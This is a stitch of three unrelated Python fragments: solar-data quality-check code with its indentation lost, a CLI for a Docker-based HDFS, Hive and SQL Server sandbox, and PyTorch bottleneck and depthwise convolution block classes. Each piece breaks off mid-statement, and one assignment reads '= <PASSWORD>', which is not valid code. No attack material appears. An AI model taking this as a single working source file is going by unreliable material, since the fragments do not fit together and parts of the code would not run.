msg = 'Daily quality scoring failed.'
self._error_msg += '\n' + msg
if verbose:
print(msg)
self.daily_scores = None
try:
self.get_daily_flags(density_lower_threshold=density_lower_threshold,
density_upper_threshold=density_upper_threshold,
linearity_threshold=linearity_threshold)
except:
msg = 'Daily quality flagging failed.'
self._error_msg += '\n' + msg
if verbose:
print(msg)
self.daily_flags = None
t_clean[1] = time()
try:
self.detect_clear_days(smoothness_threshold=clear_day_smoothness_param,
energy_threshold=clear_day_energy_param)
except:
msg = 'Clear day detection failed.'
self._error_msg += '\n' + msg
if verbose:
print(msg)
t_clean[2] = time()
try:
self.clipping_check()
except:
msg = 'Clipping check failed.'
self._error_msg += '\n' + msg
if verbose:
print(msg)
self.inverter_clipping = None
t_clean[3] = time()
try:
self.score_data_set()
except:
msg = 'Data set summary scoring failed.'
self._error_msg += '\n' + msg
if verbose:
print(msg)
self.data_quality_score = None
self.data_clearness_score = None
t_clean[4] = time()
try:
self.capacity_clustering()
except TypeError:
self.capacity_changes = None
t_clean[5] = time()
######################################################################
# Fix Time Shifts
######################################################################
t[3] = time()
if fix_shifts:
try:
self.auto_fix_time_shifts(c1=c1, c2=c2,
estimator=solar_noon_estimator,
threshold=daytime_threshold,
periodic_detector=False)
except Exception as e:
msg = 'Fix time shift algorithm failed.'
self._error_msg += '\n' + msg
if verbose:
print(msg)
print('Error message:', e)
print('\n')
self.time_shifts = None
######################################################################
# Update daytime detection based on cleaned up data
######################################################################
# self.daytime_analysis.run_optimizer(self.filled_data_matrix, plot=False)
self.daytime_analysis.calculate_times(self.filled_data_matrix)
self.boolean_masks.daytime = self.daytime_analysis.sunup_mask_estimated
######################################################################
# Process Extra columns
######################################################################
t[4] = time()
if extra_cols is not None:
freq = int(self.data_sampling * 60)
new_index = | |
config.volumes_dir
os.environ['sql_test_password'] = <PASSWORD>
def configure(args):
    """
    Build the program Config from a file, CLI arguments, or interactive input.

    Resolution order:
      * If all four config values were supplied on the command line, build
        the Config directly from them without touching any file.
      * Otherwise read ``args.config_file``; if it does not exist, offer to
        create it interactively (saving the result), or exit with status 1.
      * Individual CLI arguments override values from the file/interactive
        config.

    :param args: parsed argparse namespace with ``config_file`` and the four
        optional override attributes.
    :return: a populated Config instance (never returns on declined setup).
    """
    _f = args.config_file
    config = None
    if get_config_file_needed(args):
        if not os.path.exists(_f):
            _o = input_with_validator('Config file "%s" does not exist. Would you like to create one' \
                ' interactively? (y/n): ' % _f, 'Please input "y" or "n".', validate_yn)
            if _o.lower() == 'y':
                config = configure_interactively()
                config.save(_f)
                print('Config saved.')
            else:
                print('Program needs configuration. Exiting.')
                # Terminates the process; the previous unreachable `return`
                # after this call has been removed.
                sys.exit(1)
        else:
            config = Config.load(_f)
            print('Config read.')
        # Apply any CLI overrides on top of the loaded/created config.
        if args.project_name:
            config.project_name = args.project_name
        if args.source_dir:
            config.source_dir = args.source_dir
        if args.data_dir:
            config.data_dir = args.data_dir
        if args.volumes_dir:
            config.volumes_dir = args.volumes_dir
    else:
        config = Config(args.project_name, args.source_dir, args.data_dir, args.volumes_dir)
    return config
def configure_interactively():
    """
    Prompt the user for each configuration value and return a new Config.
    """
    proj_name = input_with_validator(
        'Please input your project name: ',
        'No spaces or non-alphanumeric characters allowed.',
        validate_project_name,
    )
    src_dir = input_with_validator(
        'Please input your playground src directory: ',
        'Please use a valid directory name that exists.',
        validate_directory,
    )
    data_dir = input_with_validator(
        'Please input your data directory: ',
        'Please use a valid directory name that exists.',
        validate_directory,
    )
    vol_dir = input_with_validator(
        'Please input your volumes directory: ',
        'Please use a valid parent directory name that exists.',
        validate_parent_directory,
    )
    return Config(proj_name, src_dir, data_dir, vol_dir)
def build_img_cmd(config, args):
    """
    Command line function. See build_img() for documentation.

    ``args`` is unused; kept for the uniform ``(config, args)`` handler signature.
    """
    build_img(config)
def format_hdfs_cmd(config, args):
    """
    Command line function. See format_hdfs() for documentation.

    ``args`` is unused; kept for the uniform ``(config, args)`` handler signature.
    """
    format_hdfs(config)
def ingest_data_cmd(config, args):
    """
    Command line function. See ingest_data() for documentation.

    ``args`` is unused; kept for the uniform ``(config, args)`` handler signature.
    """
    ingest_data(config)
def copy_source_cmd(config, args):
    """
    Command line function. See copy_source() for documentation.

    ``args`` is unused; kept for the uniform ``(config, args)`` handler signature.
    """
    copy_source(config)
def setup_hive_cmd(config, args):
    """
    Command line function. See setup_hive() for documentation.

    ``args`` is unused; kept for the uniform ``(config, args)`` handler signature.
    """
    setup_hive(config)
def cluster_up_cmd(config, args):
    """
    Command line function. See cluster_up() for documentation.

    ``args`` is unused; kept for the uniform ``(config, args)`` handler signature.
    """
    cluster_up(config)
def start_hadoop_daemons_cmd(config, args):
    """
    Command line function. See start_hadoop_daemons() for documentation.

    ``args`` is unused; kept for the uniform ``(config, args)`` handler signature.
    """
    start_hadoop_daemons(config)
def start_hive_server_cmd(config, args):
    """
    Command line function. See start_hive_server() for documentation.

    ``args`` is unused; kept for the uniform ``(config, args)`` handler signature.
    """
    start_hive_server(config)
def cluster_down_cmd(config, args):
    """
    Command line function. See cluster_down() for documentation.

    ``args`` is unused; kept for the uniform ``(config, args)`` handler signature.
    """
    cluster_down(config)
def setup_cmd(config, args):
    """
    Command line function. See setup() for documentation.

    Prompts for confirmation before wiping ``config.volumes_dir`` unless
    ``--skip-confirm`` was given on the command line.
    """
    if not args.skip_confirm:
        answer = input_with_validator(
            'Are you sure you want to delete directory "%s" and all of its'
            ' files? y/n: ' % (config.volumes_dir),
            'Please use "y" or "n".',
            validate_yn,
        ).lower()
        if answer != 'y':
            print('Cancelling.')
            return
    setup(config)
def start_cmd(config, args):
    """
    Command line function. See start() for documentation.

    ``--no-wait`` flips the ``wait`` keyword passed through to start().
    """
    should_wait = not args.no_wait
    start(config, wait=should_wait)
def stop_cmd(config, args):
    """
    Command line function. See stop() for documentation.

    ``args`` is unused; kept for the uniform ``(config, args)`` handler signature.
    """
    stop(config)
def destroy_volumes_cmd(config, args):
    """
    Command line function. See destroy_volumes() for documentation.

    Asks for confirmation before deleting persisted cluster files unless
    ``--skip-confirm`` was passed.
    """
    if not args.skip_confirm:
        answer = input_with_validator(
            'Are you sure you want to delete directory "%s" and all of its'
            ' files? y/n: ' % (config.volumes_dir),
            'Please use "y" or "n".',
            validate_yn,
        ).lower()
        if answer != 'y':
            print('Cancelling.')
            return
    destroy_volumes(config)
def print_hadoop_node_logs_cmd(config, args):
    """
    Command line function. See print_hadoop_node_logs() for documentation.

    Forwards ``args.node`` (the hadoop node whose logs to print).
    """
    print_hadoop_node_logs(config, args.node)
def beeline_cli_cmd(config, args):
    """
    Command line function. See beeline_cli() for documentation.

    ``args`` is unused; kept for the uniform ``(config, args)`` handler signature.
    """
    beeline_cli(config)
def bash_cli_cmd(config, args):
    """
    Command line function. See bash_cli() for documentation.

    Forwards ``args.node`` (Docker service name; parser default is "client").
    """
    bash_cli(config, args.node)
def sqlcmd_cli_cmd(config, args):
    """
    Command line function. See sqlcmd_cli() for documentation.

    Forwards ``args.local`` (run sqlcmd on the host instead of the client node).
    """
    sqlcmd_cli(config, args.local)
def sql_exec_query_cmd(config, args):
    """
    Command line function. See sql_exec_query() for documentation.

    Forwards ``args.query`` and ``args.database`` (parser default "master").
    """
    sql_exec_query(config, args.query, args.database)
def sql_exec_file_cmd(config, args):
    """
    Command line function. See sql_exec_file() for documentation.

    Forwards ``args.filename`` (relative filename in the source dir).
    """
    sql_exec_file(config, args.filename)
def sqoop_export_cmd(config, args):
    """
    Command line function. See sqoop_export() for documentation.

    Forwards ``args.export_dir``, ``args.sql_table``, ``args.database_name``
    (parser default "master") and ``args.delimiter`` (parser default ",").
    """
    sqoop_export(config, args.export_dir, args.sql_table, args.database_name, args.delimiter)
def local_sql_info_cmd(config, args):
    """
    Command line function. Prints out non-secured sql server connection info.

    ``args`` is unused; kept for the uniform ``(config, args)`` handler signature.
    """
    print('SERVER NAME: tcp:localhost,%d' % (PORT_SQL_SQL))
    # Fixed typo in user-facing text: "AUthentication" -> "Authentication".
    print('AUTHENTICATION: SQL Server Authentication')
    print('LOGIN: sa')
    print('PASSWORD: %s' % (SQL_TEST_PASSWORD))
def launch_ssms_win_local_cmd(config, args):
    """
    Command line function. See launch_ssms_win_local() for documentation.

    Forwards ``args.executable_path``; ``config`` is unused here.
    """
    launch_ssms_win_local(args.executable_path)
def exec_hive_file_cmd(config, args):
    """
    Command line function. See exec_hive_file() for documentation.

    Forwards ``args.src_path``.
    """
    exec_hive_file(config, args.src_path)
def exec_hive_query_cmd(config, args):
    """
    Command line function. See exec_hive_query() for documentation.

    Forwards ``args.query``.
    """
    exec_hive_query(config, args.query)
def print_health_cmd(config, args):
    """
    Command line function. See print_health() for documentation.

    ``args`` is unused; kept for the uniform ``(config, args)`` handler signature.
    """
    print_health(config)
def wait_for_healthy_nodes_cmd(config, args):
    """
    Command line function. See wait_for_healthy_nodes_print() for documentation.

    Forwards ``args.timeout``.
    """
    wait_for_healthy_nodes_print(config, args.timeout)
def get_config_file_needed(args):
    """
    Return True when any of the four config values is missing from the CLI
    arguments, i.e. they must come from a config file (or interactive setup).
    """
    cli_values = (args.project_name, args.source_dir, args.data_dir, args.volumes_dir)
    return not all(cli_values)
def main():
"""
Main entry point for the program
"""
parser = argparse.ArgumentParser(prog='playground', description='HDFS, Hive, and SQL Playground')
parser.set_defaults(func=None)
# config-file
parser.add_argument('--config-file', '-c', default='config.json', help='The filename' \
' of the configuration file.')
# config-overrides
config_group = parser.add_argument_group('config-overrides', description='Overrides' \
' the configuration variables.')
config_group.add_argument('--project-name', '-p')
config_group.add_argument('--source-dir', '-s')
config_group.add_argument('--data-dir', '-d')
config_group.add_argument('--volumes-dir', '-v')
config_group.set_defaults(project_name=None, source_dir=None, data_dir=None, volumes_dir=None)
subparsers = parser.add_subparsers()
# build-img
subparsers.add_parser('build-img', help='Builds or rebuilds the required Docker images. Do this' \
' when you change the Dockerfile or anything in ./bin/.').set_defaults(func=build_img_cmd)
# format-hdfs
subparsers.add_parser('format-hdfs', help='Formats the entire distributed file system of the' \
' running cluster.').set_defaults(func=format_hdfs_cmd)
# ingest-data
subparsers.add_parser('ingest-data', help='Copies the mounted data volume to HDFS at /data on' \
' the running cluster.').set_defaults(func=ingest_data_cmd)
# copy-source
subparsers.add_parser('copy-source', help='Copies the configured source folder to the mounted' \
' client node volume.').set_defaults(func=copy_source_cmd)
# setup-hive
subparsers.add_parser('setup-hive', help='Creates the Hive schema metastore and makes' \
' necessary directories in HDFS. Cluster should be up and hadoop daemons should already' \
' be running.').set_defaults(func=setup_hive_cmd)
# cluster-up
subparsers.add_parser('cluster-up', help='Boots up all the nodes on the cluster but does not' \
' start any of their services.').set_defaults(func=cluster_up_cmd)
# start-hadoop
subparsers.add_parser('start-hadoop', help='Starts the name node and data node services for' \
' HDFS on a running cluster.').set_defaults(func=start_hadoop_daemons_cmd)
# start-hive
subparsers.add_parser('start-hive', help='Starts the hive server in the running cluster.') \
.set_defaults(func=start_hive_server_cmd)
# cluster-down
subparsers.add_parser('cluster-down', help='Shuts down all of the nodes.') \
.set_defaults(func=cluster_down_cmd)
# setup
setup_p = subparsers.add_parser('setup', help='Sets up the cluster for the first time.')
setup_p.add_argument('--skip-confirm', '-y', action='store_true', help='Skips any confirmation' \
' messages')
setup_p.set_defaults(func=setup_cmd, skip_confirm=False)
# start
start_p = subparsers.add_parser('start', help='Spins up the cluster and starts the daemons on ' \
'each node.')
start_p.add_argument('--no-wait', '-w', action='store_true', help='Exits immediately after ' \
'the cluster daemons have been told to start rather than blocking until the nodes are healthy.')
start_p.set_defaults(func=start_cmd, no_wait=False)
# stop
subparsers.add_parser('stop', help='Stops all of the services and shuts down all of the nodes.') \
.set_defaults(func=stop_cmd)
# destroy-vol
destroy_vol_p = subparsers.add_parser('destroy-vol', help='Removes all persisted cluster files.')
destroy_vol_p.add_argument('--skip-confirm', '-y', action='store_true')
destroy_vol_p.set_defaults(func=destroy_volumes_cmd, skip_confirm=False)
# print-hadoop-logs
print_hadoop_node_logs_p = subparsers.add_parser('print-hadoop-logs', help='Prints the log file' \
' of the specified hadoop node.')
print_hadoop_node_logs_p.add_argument('--node', '-n', help='The node to check the logs for.')
print_hadoop_node_logs_p.set_defaults(func=print_hadoop_node_logs_cmd)
# beeline-cli
subparsers.add_parser('beeline-cli', help='Launches a cli using beeline on the client node.') \
.set_defaults(func=beeline_cli_cmd)
# bash-cli
bash_cli_p = subparsers.add_parser('bash-cli', help='Launches bash cli on a single node in the' \
' cluster.')
bash_cli_p.add_argument('--node', '-n', help='The Docker service name of the node. Refer to the' \
' docker-compose.yml. Examples: "client", "nn1", "dn1", etc.')
bash_cli_p.set_defaults(func=bash_cli_cmd, node='client')
# sql-cli
sql_cli_p = subparsers.add_parser('sql-cli', help='Launches sqlcmd on the client' \
' node or locally.')
sql_cli_p.add_argument('--local', '-l', action='store_true', help='If specified, sqlcmd is' \
' launched on the host machine instead of the client node. Note: this requires sqlcmd to' \
' be on the environment PATH variable.')
sql_cli_p.set_defaults(func=sqlcmd_cli_cmd, local=False)
# sql-exec-query
sql_exec_query_p = subparsers.add_parser('sql-exec-query', help='Executes an SQL query.')
sql_exec_query_p.add_argument('--query', '-q', help='The sql query.')
sql_exec_query_p.add_argument('--database', '-d', help='The database to use.')
sql_exec_query_p.set_defaults(func=sql_exec_query_cmd, database='master')
# sql-exec-file
sql_exec_file_p = subparsers.add_parser('sql-exec-file', help='Executes an SQL file on the ' \
'client node.')
sql_exec_file_p.add_argument('--filename', '-f', help='The relative filename in the source dir.')
sql_exec_file_p.set_defaults(func=sql_exec_file_cmd)
# sqoop-export
sqoop_export_p = subparsers.add_parser('sqoop-export', help='Exports CSV files loaded in HDFS' \
' to the sql server node.')
#args.export_dir, args.sql_table, args.database_name, args.delimiter
sqoop_export_p.add_argument('--export-dir', '-e', help='The directory in HDFS which contains' \
' the CSV files.')
sqoop_export_p.add_argument('--sql-table', '-t', help='The name of the sql table to export to.' \
' Note: this table should already exist with the correct schema.')
sqoop_export_p.add_argument('--database-name', '-b', help='The name of the database to' \
' export to.')
sqoop_export_p.add_argument('--delimiter', '-d', help='The character used to for delimiting' \
' the values in the HDFS files.')
sqoop_export_p.set_defaults(func=sqoop_export_cmd, database_name='master', delimiter=',')
# local-sql-info
subparsers.add_parser('local-sql-info', help='Shows the connection information for connecting' \
' to the sql server from the parent host.').set_defaults(func=local_sql_info_cmd)
# launch-ssms
launch_ssms_p = subparsers.add_parser('launch-ssms', help='Note: | |
# Repository: BayesWatch/pytorch-moonshine
# blocks and convolution definitions
import math
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
try:
from pytorch_acdc.layers import FastStackedConvACDC
except ImportError:
# then we assume you don't want to use this layer
pass
def ACDC(in_channels, out_channels, kernel_size, stride=1,
         padding=0, dilation=1, groups=1, bias=False):
    """Build a FastStackedConvACDC layer with a Conv2d-like signature.

    Requires the optional ``pytorch_acdc`` package (imported above with a
    try/except); if that import failed, calling this raises NameError.
    """
    return FastStackedConvACDC(
        in_channels,
        out_channels,
        kernel_size,
        12,  # 4th positional arg of FastStackedConvACDC (stack size, presumably) — TODO confirm
        stride=stride,
        padding=padding,
        dilation=dilation,
        groups=groups,
        bias=bias,
    )
class Conv(nn.Module):
    """Plain 2D convolution wrapped in a module, as a drop-in block type."""

    def __init__(self, in_planes, out_planes, stride=1, kernel_size=3, padding=1, bias=False):
        super(Conv, self).__init__()
        self.conv = nn.Conv2d(
            in_planes, out_planes,
            kernel_size=kernel_size,
            stride=stride,
            padding=padding,
            bias=bias,
        )

    def forward(self, x):
        # Just the convolution — no normalisation or activation in here.
        return self.conv(x)
class ConvBottleneck(nn.Module):
    """Bottleneck conv block: 1x1 down-projection -> kxk conv -> 1x1 up-projection.

    BN + ReLU follow the first two convolutions; the final 1x1 output is
    returned raw.
    """

    def __init__(self, in_planes, out_planes, bottleneck, stride=1, kernel_size=3, padding=1, bias=False):
        super(ConvBottleneck, self).__init__()
        self.conv1x1_down = nn.Conv2d(in_planes, bottleneck, kernel_size=1, stride=1, padding=0, bias=bias)
        self.bn1 = nn.BatchNorm2d(bottleneck)
        self.conv = nn.Conv2d(bottleneck, bottleneck, kernel_size=kernel_size,
                              stride=stride, padding=padding, bias=bias)
        self.bn2 = nn.BatchNorm2d(bottleneck)
        self.conv1x1_up = nn.Conv2d(bottleneck, out_planes, kernel_size=1, stride=1, padding=0, bias=bias)

    def forward(self, x):
        h = F.relu(self.bn1(self.conv1x1_down(x)))
        h = F.relu(self.bn2(self.conv(h)))
        return self.conv1x1_up(h)
class GConvBottleneck(nn.Module):
    """Bottleneck block with a grouped middle conv.

    The middle conv uses ``groups = bottleneck // group_split``, so each
    group covers ``group_split`` channels.
    """

    def __init__(self, in_planes, out_planes, bottleneck, group_split, stride=1, kernel_size=3, padding=1, bias=False):
        super(GConvBottleneck, self).__init__()
        self.conv1x1_down = nn.Conv2d(in_planes, bottleneck, kernel_size=1, stride=1, padding=0, bias=bias)
        self.bn1 = nn.BatchNorm2d(bottleneck)
        self.conv = nn.Conv2d(bottleneck, bottleneck, kernel_size=kernel_size,
                              stride=stride, padding=padding, bias=bias,
                              groups=bottleneck // group_split)
        self.bn2 = nn.BatchNorm2d(bottleneck)
        self.conv1x1_up = nn.Conv2d(bottleneck, out_planes, kernel_size=1, stride=1, padding=0, bias=bias)

    def forward(self, x):
        h = F.relu(self.bn1(self.conv1x1_down(x)))
        h = F.relu(self.bn2(self.conv(h)))
        return self.conv1x1_up(h)
class AConvBottleneck(nn.Module):
    """Bottleneck block whose middle conv uses a fixed number of groups.

    Unlike GConvBottleneck (fixed channels per group), here ``groups`` is the
    absolute group count for the middle conv.
    """

    def __init__(self, in_planes, out_planes, bottleneck, groups, stride=1, kernel_size=3, padding=1, bias=False):
        super(AConvBottleneck, self).__init__()
        self.conv1x1_down = nn.Conv2d(in_planes, bottleneck, kernel_size=1, stride=1, padding=0, bias=bias)
        self.bn1 = nn.BatchNorm2d(bottleneck)
        self.conv = nn.Conv2d(bottleneck, bottleneck, kernel_size=kernel_size,
                              stride=stride, padding=padding, bias=bias,
                              groups=groups)
        self.bn2 = nn.BatchNorm2d(bottleneck)
        self.conv1x1_up = nn.Conv2d(bottleneck, out_planes, kernel_size=1, stride=1, padding=0, bias=bias)

    def forward(self, x):
        h = F.relu(self.bn1(self.conv1x1_down(x)))
        h = F.relu(self.bn2(self.conv(h)))
        return self.conv1x1_up(h)
class G2B2(GConvBottleneck):
    """GConvBottleneck preset: bottleneck = out_planes // 2, group_split = 2."""

    def __init__(self, in_planes, out_planes, stride=1, kernel_size=3, padding=1, bias=False):
        super(G2B2, self).__init__(
            in_planes, out_planes,
            bottleneck=out_planes // 2, group_split=2,
            stride=stride, kernel_size=kernel_size, padding=padding, bias=bias)
class G4B2(GConvBottleneck):
    """GConvBottleneck preset: bottleneck = out_planes // 2, group_split = 4."""

    def __init__(self, in_planes, out_planes, stride=1, kernel_size=3, padding=1, bias=False):
        super(G4B2, self).__init__(
            in_planes, out_planes,
            bottleneck=out_planes // 2, group_split=4,
            stride=stride, kernel_size=kernel_size, padding=padding, bias=bias)
class G8B2(GConvBottleneck):
    """GConvBottleneck preset: bottleneck = out_planes // 2, group_split = 8."""

    def __init__(self, in_planes, out_planes, stride=1, kernel_size=3, padding=1, bias=False):
        super(G8B2, self).__init__(
            in_planes, out_planes,
            bottleneck=out_planes // 2, group_split=8,
            stride=stride, kernel_size=kernel_size, padding=padding, bias=bias)
class G16B2(GConvBottleneck):
    """GConvBottleneck preset: bottleneck = out_planes // 2, group_split = 16."""

    def __init__(self, in_planes, out_planes, stride=1, kernel_size=3, padding=1, bias=False):
        super(G16B2, self).__init__(
            in_planes, out_planes,
            bottleneck=out_planes // 2, group_split=16,
            stride=stride, kernel_size=kernel_size, padding=padding, bias=bias)
class A2B2(AConvBottleneck):
    """AConvBottleneck preset: bottleneck = out_planes // 2, 2 groups."""

    def __init__(self, in_planes, out_planes, stride=1, kernel_size=3, padding=1, bias=False):
        super(A2B2, self).__init__(
            in_planes, out_planes,
            bottleneck=out_planes // 2, groups=2,
            stride=stride, kernel_size=kernel_size, padding=padding, bias=bias)
class A4B2(AConvBottleneck):
    """AConvBottleneck preset: bottleneck = out_planes // 2, 4 groups."""

    def __init__(self, in_planes, out_planes, stride=1, kernel_size=3, padding=1, bias=False):
        super(A4B2, self).__init__(
            in_planes, out_planes,
            bottleneck=out_planes // 2, groups=4,
            stride=stride, kernel_size=kernel_size, padding=padding, bias=bias)
class A8B2(AConvBottleneck):
    """AConvBottleneck preset: bottleneck = out_planes // 2, 8 groups."""

    def __init__(self, in_planes, out_planes, stride=1, kernel_size=3, padding=1, bias=False):
        super(A8B2, self).__init__(
            in_planes, out_planes,
            bottleneck=out_planes // 2, groups=8,
            stride=stride, kernel_size=kernel_size, padding=padding, bias=bias)
class A16B2(AConvBottleneck):
    """AConvBottleneck preset: bottleneck = out_planes // 2, 16 groups."""

    def __init__(self, in_planes, out_planes, stride=1, kernel_size=3, padding=1, bias=False):
        super(A16B2, self).__init__(
            in_planes, out_planes,
            bottleneck=out_planes // 2, groups=16,
            stride=stride, kernel_size=kernel_size, padding=padding, bias=bias)
class G2B4(GConvBottleneck):
    """GConvBottleneck preset: bottleneck = out_planes // 4, group_split = 2."""

    def __init__(self, in_planes, out_planes, stride=1, kernel_size=3, padding=1, bias=False):
        super(G2B4, self).__init__(
            in_planes, out_planes,
            bottleneck=out_planes // 4, group_split=2,
            stride=stride, kernel_size=kernel_size, padding=padding, bias=bias)
class G4B4(GConvBottleneck):
    """GConvBottleneck preset: bottleneck = out_planes // 4, group_split = 4."""

    def __init__(self, in_planes, out_planes, stride=1, kernel_size=3, padding=1, bias=False):
        super(G4B4, self).__init__(
            in_planes, out_planes,
            bottleneck=out_planes // 4, group_split=4,
            stride=stride, kernel_size=kernel_size, padding=padding, bias=bias)
class G8B4(GConvBottleneck):
    """GConvBottleneck preset: bottleneck = out_planes // 4, group_split = 8."""

    def __init__(self, in_planes, out_planes, stride=1, kernel_size=3, padding=1, bias=False):
        super(G8B4, self).__init__(
            in_planes, out_planes,
            bottleneck=out_planes // 4, group_split=8,
            stride=stride, kernel_size=kernel_size, padding=padding, bias=bias)
class G16B4(GConvBottleneck):
    """GConvBottleneck preset: bottleneck = out_planes // 4, group_split = 16."""

    def __init__(self, in_planes, out_planes, stride=1, kernel_size=3, padding=1, bias=False):
        super(G16B4, self).__init__(
            in_planes, out_planes,
            bottleneck=out_planes // 4, group_split=16,
            stride=stride, kernel_size=kernel_size, padding=padding, bias=bias)
class ConvB2(ConvBottleneck):
    """ConvBottleneck preset with bottleneck width out_planes // 2."""

    def __init__(self, in_planes, out_planes, stride=1, kernel_size=3, padding=1, bias=False):
        super(ConvB2, self).__init__(
            in_planes, out_planes, bottleneck=out_planes // 2,
            stride=stride, kernel_size=kernel_size, padding=padding, bias=bias)
class ConvB4(ConvBottleneck):
    """ConvBottleneck preset with bottleneck width out_planes // 4."""

    def __init__(self, in_planes, out_planes, stride=1, kernel_size=3, padding=1, bias=False):
        super(ConvB4, self).__init__(
            in_planes, out_planes, bottleneck=out_planes // 4,
            stride=stride, kernel_size=kernel_size, padding=padding, bias=bias)
class ConvB8(ConvBottleneck):
    """ConvBottleneck preset with bottleneck width out_planes // 8."""

    def __init__(self, in_planes, out_planes, stride=1, kernel_size=3, padding=1, bias=False):
        super(ConvB8, self).__init__(
            in_planes, out_planes, bottleneck=out_planes // 8,
            stride=stride, kernel_size=kernel_size, padding=padding, bias=bias)
class ConvB16(ConvBottleneck):
    """ConvBottleneck preset with bottleneck width out_planes // 16."""

    def __init__(self, in_planes, out_planes, stride=1, kernel_size=3, padding=1, bias=False):
        super(ConvB16, self).__init__(
            in_planes, out_planes, bottleneck=out_planes // 16,
            stride=stride, kernel_size=kernel_size, padding=padding, bias=bias)
class Conv2x2(nn.Module):
    """2x2 convolution with dilation 2.

    NOTE(review): the ``kernel_size`` parameter is accepted only for
    signature compatibility with the other block types — the kernel is
    hard-coded to 2 regardless of what is passed.
    """

    def __init__(self, in_planes, out_planes, stride=1, kernel_size=2, padding=1, bias=False):
        super(Conv2x2, self).__init__()
        self.conv = nn.Conv2d(
            in_planes, out_planes,
            kernel_size=2, dilation=2,
            stride=stride, padding=padding, bias=bias,
        )

    def forward(self, x):
        return self.conv(x)
class DConv(nn.Module):
    """Separable conv block: grouped kxk conv, BN + ReLU, then a 1x1 projection.

    Replaces the plain conv block type; the caller is expected to apply
    BN + ReLU to the output, while the internal BN + ReLU is explicit here.
    With ``groups=None`` the kxk conv is fully depthwise (one group per
    input channel).
    """

    def __init__(self, in_planes, out_planes, stride=1, kernel_size=3, padding=1, bias=False, groups=None):
        super(DConv, self).__init__()
        dw_groups = in_planes if groups is None else groups
        self.convdw = nn.Conv2d(in_planes, in_planes, kernel_size=kernel_size,
                                stride=stride, padding=padding, bias=bias,
                                groups=dw_groups)
        self.bn = nn.BatchNorm2d(in_planes)
        self.conv1x1 = nn.Conv2d(in_planes, out_planes, kernel_size=1, stride=1, padding=0, bias=bias)

    def forward(self, x):
        h = self.convdw(x)
        h = F.relu(self.bn(h))
        return self.conv1x1(h)
class DConvG2(DConv):
    """DConv preset with groups = in_planes // 2 (2 channels per group)."""

    def __init__(self, in_planes, out_planes, stride=1, kernel_size=3, padding=1, bias=False):
        super(DConvG2, self).__init__(
            in_planes, out_planes, stride=stride, kernel_size=kernel_size,
            padding=padding, bias=bias, groups=in_planes // 2)
class DConvG4(DConv):
    """DConv preset with groups = in_planes // 4 (4 channels per group)."""

    def __init__(self, in_planes, out_planes, stride=1, kernel_size=3, padding=1, bias=False):
        super(DConvG4, self).__init__(
            in_planes, out_planes, stride=stride, kernel_size=kernel_size,
            padding=padding, bias=bias, groups=in_planes // 4)
class DConvG8(DConv):
    """DConv preset with groups = in_planes // 8 (8 channels per group)."""

    def __init__(self, in_planes, out_planes, stride=1, kernel_size=3, padding=1, bias=False):
        super(DConvG8, self).__init__(
            in_planes, out_planes, stride=stride, kernel_size=kernel_size,
            padding=padding, bias=bias, groups=in_planes // 8)
class DConvG16(DConv):
    """DConv preset with groups = in_planes // 16 (16 channels per group)."""

    def __init__(self, in_planes, out_planes, stride=1, kernel_size=3, padding=1, bias=False):
        super(DConvG16, self).__init__(
            in_planes, out_planes, stride=stride, kernel_size=kernel_size,
            padding=padding, bias=bias, groups=in_planes // 16)
class DConvA2(DConv):
    """DConv preset with a fixed group count of 2."""

    def __init__(self, in_planes, out_planes, stride=1, kernel_size=3, padding=1, bias=False):
        super(DConvA2, self).__init__(
            in_planes, out_planes, stride=stride, kernel_size=kernel_size,
            padding=padding, bias=bias, groups=2)
class DConvA4(DConv):
    """DConv preset with a fixed group count of 4."""

    def __init__(self, in_planes, out_planes, stride=1, kernel_size=3, padding=1, bias=False):
        super(DConvA4, self).__init__(
            in_planes, out_planes, stride=stride, kernel_size=kernel_size,
            padding=padding, bias=bias, groups=4)
class DConvA8(DConv):
    """DConv preset with a fixed group count of 8."""

    def __init__(self, in_planes, out_planes, stride=1, kernel_size=3, padding=1, bias=False):
        super(DConvA8, self).__init__(
            in_planes, out_planes, stride=stride, kernel_size=kernel_size,
            padding=padding, bias=bias, groups=8)
class DConvA16(DConv):
    """DConv preset with a fixed group count of 16."""

    def __init__(self, in_planes, out_planes, stride=1, kernel_size=3, padding=1, bias=False):
        super(DConvA16, self).__init__(
            in_planes, out_planes, stride=stride, kernel_size=kernel_size,
            padding=padding, bias=bias, groups=16)
class DConvBottleneck(nn.Module):
    """Bottleneck block with a depthwise middle conv.

    Pipeline: 1x1 down-projection -> depthwise kxk conv -> 1x1 up-projection,
    with BN + ReLU after the first two stages.
    """

    def __init__(self, in_planes, out_planes, bottleneck, stride=1, kernel_size=3, padding=1, bias=False):
        super(DConvBottleneck, self).__init__()
        self.conv1x1_down = nn.Conv2d(in_planes, bottleneck, kernel_size=1, stride=1, padding=0, bias=bias)
        self.bn1 = nn.BatchNorm2d(bottleneck)
        # groups == channels -> one filter per channel (depthwise).
        self.convdw = nn.Conv2d(bottleneck, bottleneck, kernel_size=kernel_size,
                                stride=stride, padding=padding, bias=bias,
                                groups=bottleneck)
        self.bn2 = nn.BatchNorm2d(bottleneck)
        self.conv1x1_up = nn.Conv2d(bottleneck, out_planes, kernel_size=1, stride=1, padding=0, bias=bias)

    def forward(self, x):
        h = F.relu(self.bn1(self.conv1x1_down(x)))
        h = F.relu(self.bn2(self.convdw(h)))
        return self.conv1x1_up(h)
class DConvB2(DConvBottleneck):
    """DConvBottleneck with the bottleneck width fixed at ``out_planes // 2``."""

    def __init__(self, in_planes, out_planes, stride=1, kernel_size=3, padding=1, bias=False):
        super().__init__(
            in_planes, out_planes, out_planes // 2,
            kernel_size=kernel_size, stride=stride, padding=padding,
            bias=bias)
class DConvB4(DConvBottleneck):
    """DConvBottleneck with the bottleneck width fixed at ``out_planes // 4``."""

    def __init__(self, in_planes, out_planes, stride=1, kernel_size=3, padding=1, bias=False):
        super().__init__(
            in_planes, out_planes, out_planes // 4,
            kernel_size=kernel_size, stride=stride, padding=padding,
            bias=bias)
class DConvB8(DConvBottleneck):
    """DConvBottleneck with the bottleneck width fixed at ``out_planes // 8``."""

    def __init__(self, in_planes, out_planes, stride=1, kernel_size=3, padding=1, bias=False):
        super().__init__(
            in_planes, out_planes, out_planes // 8,
            kernel_size=kernel_size, stride=stride, padding=padding,
            bias=bias)
class DConvB16(DConvBottleneck):
    """DConvBottleneck with the bottleneck width fixed at ``out_planes // 16``."""

    def __init__(self, in_planes, out_planes, stride=1, kernel_size=3, padding=1, bias=False):
        super().__init__(
